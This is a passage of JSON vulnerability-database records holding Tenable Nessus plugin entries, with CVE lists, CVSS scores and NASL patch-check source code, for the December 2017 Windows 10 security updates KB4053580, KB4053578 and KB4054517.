"SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2020-08-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_DEC_4053580.NASL", "href": "https://www.tenable.com/plugins/nessus/105181", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105181);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11888\",\n \"CVE-2017-11889\",\n \"CVE-2017-11890\",\n \"CVE-2017-11893\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11899\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11905\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11909\",\n \"CVE-2017-11910\",\n \"CVE-2017-11911\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11914\",\n \"CVE-2017-11918\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102050,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102065,\n 102077,\n 102078,\n 102080,\n 102081,\n 102082,\n 102085,\n 102086,\n 102087,\n 102088,\n 102089,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4053580\");\n script_xref(name:\"MSFT\", value:\"MS17-4053580\");\n\n script_name(english:\"KB4053580: Windows 10 Version 1703 December 2017 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4053580.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11889,\n CVE-2017-11893, CVE-2017-11905, CVE-2017-11909,\n CVE-2017-11910, CVE-2017-11911, CVE-2017-11914,\n CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4053580/windows-10-update-kb4053580\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7a4dd124\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4053580.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4053580');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4053580])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:43:00", "description": "The remote Windows host is missing security update 4053578.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "KB4053578: Windows 10 Version 1511 December 2017 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2020-08-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_DEC_4053578.NASL", "href": "https://www.tenable.com/plugins/nessus/105179", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105179);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11888\",\n \"CVE-2017-11889\",\n \"CVE-2017-11890\",\n \"CVE-2017-11893\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11899\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11905\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11909\",\n \"CVE-2017-11910\",\n \"CVE-2017-11911\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11914\",\n \"CVE-2017-11918\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102050,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102065,\n 102077,\n 102078,\n 102080,\n 102081,\n 102082,\n 102085,\n 102086,\n 102087,\n 102088,\n 102089,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4053578\");\n script_xref(name:\"MSFT\", value:\"MS17-4053578\");\n\n script_name(english:\"KB4053578: Windows 10 Version 1511 December 2017 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4053578.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11889,\n CVE-2017-11893, CVE-2017-11905, CVE-2017-11909,\n CVE-2017-11910, CVE-2017-11911, CVE-2017-11914,\n CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4053578/windows-10-update-kb4053578\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00abfab6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4053578.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4053578');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4053578])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:56", "description": "The remote Windows host is missing security update 4054517.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "KB4054517: Windows 10 Version 1709 and Windows Server Version 1709 December 2017 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2020-08-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_DEC_4054517.NASL", "href": "https://www.tenable.com/plugins/nessus/105183", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105183);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11888\",\n \"CVE-2017-11889\",\n \"CVE-2017-11890\",\n \"CVE-2017-11893\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11899\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11905\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11908\",\n \"CVE-2017-11909\",\n \"CVE-2017-11910\",\n \"CVE-2017-11911\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11914\",\n \"CVE-2017-11918\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102050,\n 102052,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102065,\n 102077,\n 102078,\n 102080,\n 102081,\n 102082,\n 102085,\n 102086,\n 102087,\n 102088,\n 102089,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4054517\");\n script_xref(name:\"MSFT\", value:\"MS17-4054517\");\n\n script_name(english:\"KB4054517: Windows 10 Version 1709 and Windows Server Version 1709 December 2017 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4054517.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11889,\n CVE-2017-11893, CVE-2017-11905, CVE-2017-11908,\n CVE-2017-11909, CVE-2017-11910, CVE-2017-11911,\n CVE-2017-11914, CVE-2017-11918)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, 